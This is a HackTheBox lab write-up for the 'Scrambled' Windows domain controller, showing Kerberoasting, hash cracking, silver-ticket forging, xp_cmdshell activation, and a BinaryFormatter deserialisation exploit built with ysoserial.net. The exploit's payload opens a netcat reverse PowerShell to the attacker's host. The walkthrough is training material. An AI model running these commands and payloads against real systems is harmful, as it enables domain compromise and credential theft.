HackTheBoxActiveDirectoryWindows

Scrambled

Medium Windows AD box. Kerberoast sqlsvc → silver ticket → MSSQL creds for MiscSvc → WinRM shell. Reverse engineer .NET app on port 4411 → BinaryFormatter deserialization RCE → SYSTEM.

Difficulty: Medium OS: Windows (Active Directory) IP: 10.129.3.74

Enumeration

Nmap

The large number of open ports is typical of a Windows domain controller.

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.3.74 -sCV   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:33 -0400
Nmap scan report for 10.129.3.74
Host is up (0.21s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-13 05:33:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.3.74:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-13T05:19:22
|_Not valid after:  2056-03-13T05:19:22
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after:  2121-06-08T22:39:53
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-13T05:34:45
|_  start_date: N/A

Port 4411 hosts an unknown service. Connecting with telnet shows a banner (SCRAMBLECORP_ORDERS_V1.0.3;) but no valid commands are known yet — this will be revisited during privilege escalation.

IIS — Port 80

Browsing to http://scrm.local reveals the Scramble Corp intranet site.

IT Services tab: A notice states that NTLM authentication has been disabled across the entire network following a security breach, and that Kerberos is to be used instead.

Contacting IT Support page: A screenshot of a Command Prompt window is shown as an example of how to collect network information for a support ticket. The screenshot reveals a username in the file path. This part of the website reveals a username

and the website also mentions that the NTLM has been turned off, plus the nxc smb displays NTLM to be false

SMB Enumeration

The password of ksimpson turns out be the same as username Then SMB shares are enumerated using nxc with Kerberos authentication (-k):

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ nxc smb 10.129.3.74 -u 'ksimpson' -p 'ksimpson' -k --shares
SMB         10.129.3.74     445    DC1              [*]  x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB         10.129.3.74     445    DC1              [+] scrm.local\ksimpson:ksimpson 
SMB         10.129.3.74     445    DC1              [*] Enumerated shares
SMB         10.129.3.74     445    DC1              Share           Permissions     Remark
SMB         10.129.3.74     445    DC1              -----           -----------     ------
SMB         10.129.3.74     445    DC1              ADMIN$                          Remote Admin
SMB         10.129.3.74     445    DC1              C$                              Default share
SMB         10.129.3.74     445    DC1              HR                              
SMB         10.129.3.74     445    DC1              IPC$            READ            Remote IPC
SMB         10.129.3.74     445    DC1              IT                              
SMB         10.129.3.74     445    DC1              NETLOGON        READ            Logon server share 
SMB         10.129.3.74     445    DC1              Public          READ            
SMB         10.129.3.74     445    DC1              Sales                           
SMB         10.129.3.74     445    DC1              SYSVOL          READ            Logon server share 


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ kinit ksimpson          
Password for [email protected]: 


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ smbclient //dc1.scrm.local/Public -U ksimpson --use-kerberos=required
Password for [WORKGROUP\ksimpson]:
smb: \> ls
  .                                   D        0  Thu Nov  4 18:23:19 2021
  ..                                  D        0  Thu Nov  4 18:23:19 2021
  Network Security Changes.pdf        A   630106  Thu Nov  4 18:20:49 2021
smb: \> get "Network Security Changes.pdf"
getting file \Network Security Changes.pdf of size 630106 as Network

The Public share is accessible. Connecting to it reveals a PDF: The PDF is an internal memo confirming NTLM has been disabled

Kerberoasting

Service accounts are assigned Service Principal Names (SPNs) in Active Directory. Any domain user can request a Kerberos service ticket for an SPN, which is encrypted with the service account's password hash. This ticket can be taken offline and cracked — an attack known as Kerberoasting.

GetUserSPNs.py is used from Impacket. Since NTLM is disabled, the -dc-host option must use the FQDN rather than the IP:

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ GetUserSPNs.py -k -dc-ip 10.129.3.74 scrm.local/ksimpson -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ GetUserSPNs.py -k -dc-host dc1.scrm.local scrm.local/ksimpson -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2026-03-13 01:19:20.331562             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2026-03-13 01:19:20.331562             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1ea461b71c199ae8457cd6454b7dc245$d3...SNIP...bb492ac6353dc468705fde31f47dc47553b797bcb70afe66c82137355d6ebc6de029fadba

A TGS hash for the sqlsvc account is obtained. The hash is cracked with hashcat:

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ hashcat -m 13100 sqlsvchash.txt /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1ea...SNIP...iojc8d4cb071ee:Pegasus60
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1...b071ee
Time.Started.....: Fri Mar 13 02:38:15 2026 (8 secs)
Time.Estimated...: Fri Mar 13 02:38:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  1339.3 kH/s (1.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10731520/14344385 (74.81%)
Rejected.........: 0/10731520 (0.00%)
Restore.Point....: 10727424/14344385 (74.78%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Petey55 -> Pastillez
Hardware.Mon.#01.: Util: 73%

The plaintext password for sqlsvc is Pegasus60.

Foothold — Silver Ticket Attack

Although we now have the password for sqlsvc, we cannot simply authenticate to MSSQL as that account and gain useful access. However, because sqlsvc is the service account running the MSSQL service and we know its password, we can perform a silver ticket attack.

A silver ticket is a forged Kerberos TGS (service ticket) that is signed using the service account's own password hash. Unlike a golden ticket, it does not involve the KDC — the ticket is forged entirely offline and used to authenticate directly to the target service, impersonating any user (including Administrator).

Three pieces of information are needed:

The NTLM hash of sqlsvc's password
The domain SID
The SPN of the MSSQL service

Step 1 — Derive the NTLM Hash

NTLM hashes are computed as the MD4 hash of the UTF-16LE encoded password:

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ python3 -c "import hashlib,binascii; print(binascii.hexlify(hashlib.new('md4', 'Pegasus60'.encode('utf-16le')).digest()).decode())"
b999a16500b87d17ec7f2e2a68778f05

Step 2 — Retrieve the Domain SID

getPac.py from Impacket is used to extract the domain SID:

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ getPac.py -targetUser sqlsvc SCRM.LOCAL/ksimpson:ksimpson
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
...SNIP...
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

Step 3 — Forge the Silver Ticket

ticketer.py from Impacket is used to forge a TGS ticket for the Administrator user against the MSSQL SPN:

┌──(kali㉿kali)-[~]
└─$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain SCRM.LOCAL -spn MSSQLSvc/dc1.scrm.local Administrator 
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SCRM.LOCAL/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Step 4 — Connect to MSSQL

The forged ticket is exported and used to authenticate to the MSSQL service We are now connected to MSSQL as Administrator.

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache
~/.local/share/pipx/venvs/impacket/bin/mssqlclient.py -k -no-pass dc1.scrm.local

Database Enumeration

We are now connected to MSSQL as Administrator. xp_cmdshell is enabled to confirm the execution context:

SQL (SCRM\administrator  dbo@master)> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> EXEC xp_cmdshell 'whoami';
output        
-----------   
scrm\sqlsvc   
NULL

The databases are listed:

SQL (SCRM\administrator  dbo@master)> SELECT name FROM master.dbo.sysdatabases;
name         
----------   
master       
tempdb       
model        
msdb         
ScrambleHR

The ScrambleHR database is interesting. Its tables are enumerated:

SQL (SCRM\administrator  dbo@master)> USE ScrambleHR;
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL (SCRM\administrator  dbo@ScrambleHR)> SELECT * FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
ScrambleHR      dbo            Employees    b'BASE TABLE'   
ScrambleHR      dbo            UserImport   b'BASE TABLE'   
ScrambleHR      dbo            Timesheets   b'BASE TABLE'

The UserImport table contains credentials:

SQL (SCRM\administrator  dbo@ScrambleHR)> SELECT * FROM UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0

User Flag

The credentials MiscSvc:ScrambledEggs9900 are used to connect via WinRM using evil-winrm with Kerberos authentication:

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ kinit [email protected]
Password for [email protected]: 


┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ evil-winrm -i dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -r SCRM.LOCAL

*Evil-WinRM* PS C:\Users\miscsvc\Documents> type ../Desktop/user.txt
0d9exxxxxxxxxxxxxxxxxxxxxxxxxxx907c

Privilege Escalation — Insecure Deserialisation (Port 4411)

During system enumeration, the IT SMB share (accessible as MiscSvc) contains a .NET application:

*Evil-WinRM* PS C:\Shares\IT\Apps\Sales Order Client> ls
    Directory: C:\Shares\IT\Apps\Sales Order Client

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/5/2021   8:52 PM          86528 ScrambleClient.exe
-a----        11/5/2021   8:52 PM          19456 ScrambleLib.dll

Reverse Engineering ScrambleLib.dll

The DLL is decompiled using dnSpy. Analysis reveals:

1. Hardcoded developer authentication bypass: The Logon() method in the ScrambleNetClient class contains a bypass: if the username is scrmdev, authentication is skipped entirely.

if (string.Compare(Username, "scrmdev", true) == 0)
{
    Log.Write("Developer logon bypass used");
    result = true;
}

2. Custom TCP wire protocol:

Commands are sent as newline-terminated ASCII strings in the format CODE;PARAMETER\n. The server listens on port 4411 and responds to commands such as LIST_ORDERS and UPLOAD_ORDER.

// Connects via raw TCP, expects a banner on connection
TcpClient tcpClient = new TcpClient();
tcpClient.Connect(this.Server, this.Port);

// Commands are sent as: "CODE;PARAMETER\n"
string text = ScrambleNetRequest.GetCodeFromMessageType(Request.Type) + ";" + Request.Parameter + "\n";
streamWriter.Write(text);

3. Insecure BinaryFormatter deserialisation: The UPLOAD_ORDER command causes the server to deserialise a Base64-encoded payload using BinaryFormatter.Deserialize() with no validation:

// Serializes a SalesOrder object to Base64 using BinaryFormatter
public string SerializeToBase64() {
    BinaryFormatter binaryFormatter = new BinaryFormatter();
    binaryFormatter.Serialize(memoryStream, this);
    return Convert.ToBase64String(memoryStream.ToArray());
}

// Server-side: deserializes attacker-controlled Base64 input
public static SalesOrder DeserializeFromBase64(string Base64) {
    byte[] buffer = Convert.FromBase64String(Base64);
    BinaryFormatter binaryFormatter = new BinaryFormatter();
    result = (SalesOrder)binaryFormatter.Deserialize(memoryStream); // ← vulnerable
}

BinaryFormatter is an inherently unsafe deserialiser — it instantiates arbitrary .NET types during deserialisation, making it susceptible to gadget-chain attacks.

Crafting the Payload

nc64.exe is first uploaded to the target via the existing MiscSvc WinRM session:

*Evil-WinRM* PS C:\Users\miscsvc\music> upload nc64.exe

Info: Uploading /home/kali/Documents/scrambled/nc64.exe to 

C:\Users\miscsvc\music\nc64.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!

A malicious serialised payload is generated using ysoserial.net with the WindowsIdentity gadget chain, which triggers command execution during deserialisation:

E:\gg2\Release>ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\users\miscsvc\music\nc64.exe -e powershell 10.10.16.5 4444"
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN0FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUVNNlhIVnpaWEp6WEcxcGMyTnpkbU5jYlhWemFXTmNibU0yTkM1bGVHVWdMV1VnY0c5M1pYSnphR1ZzYkNBeE1DNHhNQzR4Tmk0MUlEUTBORFFpSUZOMFlXNWtZWEprUlhKeWIzSkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRk4wWVc1a1lYSmtUM1YwY0hWMFJXNWpiMlJwYm1jOUludDRPazUxYkd4OUlpQlZjMlZ5VG1GdFpUMGlJaUJRWVhOemQyOXlaRDBpZTNnNlRuVnNiSDBpSUVSdmJXRnBiajBpSWlCTWIyRmtWWE5sY2xCeWIyWnBiR1U5SWtaaGJITmxJaUJHYVd4bFRtRnRaVDBpWTIxa0lpQXZQZzBLSUNBZ0lDQWdQQzl6WkRwUWNtOWpaWE56TGxOMFlYSjBTVzVtYno0TkNpQWdJQ0E4TDNOa09sQnliMk5sYzNNK0RRb2dJRHd2VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJK0N3PT0L

A listener is started:

┌──(kali㉿kali)-[~/Documents/scrambled/Release]
└─$ rlwrap nc -lvnp 4444

The payload is delivered to the server via telnet. The protocol flow is:

Connect — server responds with SCRAMBLECORP_ORDERS_V1.0.3;
No explicit login is needed; the UPLOAD_ORDER command is sent directly with the Base64 payload

┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ telnet scrm.local 4411
Trying 10.129.3.74...
Connected to scrm.local.
Escape character is '^]'.
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN0FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUVNNlhIVnpaWEp6WEcxcGMyTnpkbU5jYlhWemFXTmNibU0yTkM1bGVHVWdMV1VnY0c5M1pYSnphR1ZzYkNBeE1DNHhNQzR4Tmk0MUlEUTBORFFpSUZOMFlXNWtZWEprUlhKeWIzSkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRk4wWVc1a1lYSmtUM1YwY0hWMFJXNWpiMlJwYm1jOUludDRPazUxYkd4OUlpQlZjMlZ5VG1GdFpUMGlJaUJRWVhOemQyOXlaRDBpZTNnNlRuVnNiSDBpSUVSdmJXRnBiajBpSWlCTWIyRmtWWE5sY2xCeWIyWnBiR1U5SWtaaGJITmxJaUJHYVd4bFRtRnRaVDBpWTIxa0lpQXZQZzBLSUNBZ0lDQWdQQzl6WkRwUWNtOWpaWE56TGxOMFlYSjBTVzVtYno0TkNpQWdJQ0E4TDNOa09sQnliMk5sYzNNK0RRb2dJRHd2VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJK0N3PT0L
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
SESSION_TIMED_OUT;
Connection closed by foreign host.

Despite the error response from the server (the object cannot be cast to SalesOrder), the gadget chain executes during deserialisation before the cast, so the payload fires regardless.

Root Shell

connect to [10.10.16.5] from (UNKNOWN) [10.129.3.74] 61682
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
0a03xxxxxxxxxxxxxxxxxxxx6766

A shell is obtained as NT AUTHORITY\SYSTEM (the context of the service running the sales order application), and the root flag is retrieved.

Attack Chain Summary

Step

Technique

Outcome

Web enumeration

OSINT / screenshot analysis

Discovered username ksimpson and password policy

SMB access

Kerberos auth with ksimpson:ksimpson

Read Public share; obtained Network Security Changes.pdf

Kerberoasting

GetUserSPNs.py + hashcat

Cracked sqlsvc hash → Pegasus60

Silver ticket

ticketer.py (Impacket)

Forged TGS as Administrator on MSSQL

DB enumeration

mssqlclient.py

Found MiscSvc:ScrambledEggs9900 in UserImport table

WinRM shell

evil-winrm + Kerberos

Shell as MiscSvc; user flag

.NET RE

dnSpy analysis of ScrambleLib.dll

Discovered dev bypass + insecure BinaryFormatter

Deserialisation RCE

ysoserial.net + telnet

Shell as NT AUTHORITY\SYSTEM; root flag

PreviousCertified NextFlight

Last updated 4 days ago

hashtagEnumeration

hashtagNmap

hashtagIIS — Port 80

hashtagSMB Enumeration

hashtagKerberoasting

hashtagFoothold — Silver Ticket Attack

hashtagStep 1 — Derive the NTLM Hash

hashtagStep 2 — Retrieve the Domain SID

hashtagStep 3 — Forge the Silver Ticket

hashtagStep 4 — Connect to MSSQL

hashtagDatabase Enumeration

hashtagUser Flag

hashtagPrivilege Escalation — Insecure Deserialisation (Port 4411)

hashtagReverse Engineering ScrambleLib.dll

hashtagCrafting the Payload

hashtagRoot Shell

hashtagAttack Chain Summary

Enumeration

Nmap

IIS — Port 80

SMB Enumeration

Kerberoasting

Foothold — Silver Ticket Attack

Step 1 — Derive the NTLM Hash

Step 2 — Retrieve the Domain SID

Step 3 — Forge the Silver Ticket

Step 4 — Connect to MSSQL

Database Enumeration

User Flag

Privilege Escalation — Insecure Deserialisation (Port 4411)

Reverse Engineering ScrambleLib.dll

Crafting the Payload

Root Shell

Attack Chain Summary